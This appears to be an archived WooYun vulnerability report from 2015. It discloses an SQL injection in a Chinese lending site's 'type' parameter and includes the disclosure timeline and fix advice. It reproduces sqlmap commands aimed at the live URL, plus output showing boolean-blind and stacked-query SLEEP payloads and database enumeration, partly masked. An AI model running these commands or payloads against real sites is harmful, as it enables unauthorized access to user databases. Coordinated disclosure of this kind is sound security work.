乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-24: 细节已通知厂商并且等待厂商处理中 2015-06-24: 厂商已经确认,细节仅向厂商公开 2015-07-04: 细节向核心白帽子及相关领域专家公开 2015-07-14: 细节向普通白帽子公开 2015-07-24: 细节向实习白帽子公开 2015-08-08: 细节向公众公开
0.0
注入点:https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0
GET参数type未有效过滤导致存在注入仅通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复!
python sqlmap.py -u "https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0" -p "type" --batch --dbsweb application technology: Nginx, PHP 5.5.19back-end DBMS: MySQL 5.0.11available databases [5]: mask 区域 *****tion_s**********oud**********ysq**********ance_s********** w***** python sqlmap.py -u "https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0" -p "type" --batch --count -D koudaisqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=1) AND 4706=4706 AND (2180=2180&status=0&period=2&apr=0 Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: type=1);(SELECT * FROM (SELECT(SLEEP(5)))tenz)#&status=0&period=2&apr=0---Database: koudai mask 区域 *****-----------********** **********-----------**********o ********** **********ts ********** ********** ********** ********** ********** **********l ********** ********** ********** ********** ********** ********** ********** ********** **********ails ********** ********** ********** ********** **********d ********** ********** ********** ********** **********t ********** ********** ********** **********cket **********ket ********** **********og ********** ********** ********** ********** ********** **********on ********** ********** ********** **********t ********** ********** **********_weekly ********** ********** ********** **********nce_record ********** **********t ********** ********** ********** ********** ********** ********** ********** ********** ********** **********ze **********ner ********** **********----------*****
*****tion_s**********oud**********ysq**********ance_s********** w*****
python sqlmap.py -u "https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0" -p "type" --batch --count -D koudaisqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=1) AND 4706=4706 AND (2180=2180&status=0&period=2&apr=0 Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: type=1);(SELECT * FROM (SELECT(SLEEP(5)))tenz)#&status=0&period=2&apr=0---Database: koudai
*****-----------********** **********-----------**********o ********** **********ts ********** ********** ********** ********** ********** **********l ********** ********** ********** ********** ********** ********** ********** ********** **********ails ********** ********** ********** ********** **********d ********** ********** ********** ********** **********t ********** ********** ********** **********cket **********ket ********** **********og ********** ********** ********** ********** ********** **********on ********** ********** ********** **********t ********** ********** **********_weekly ********** ********** ********** **********nce_record ********** **********t ********** ********** ********** ********** ********** ********** ********** ********** ********** **********ze **********ner ********** **********----------*****
**********
1.有效过滤2.来吧,乌云众测等你!
危害等级:高
漏洞Rank:15
确认时间:2015-06-24 10:04
多谢提醒
暂无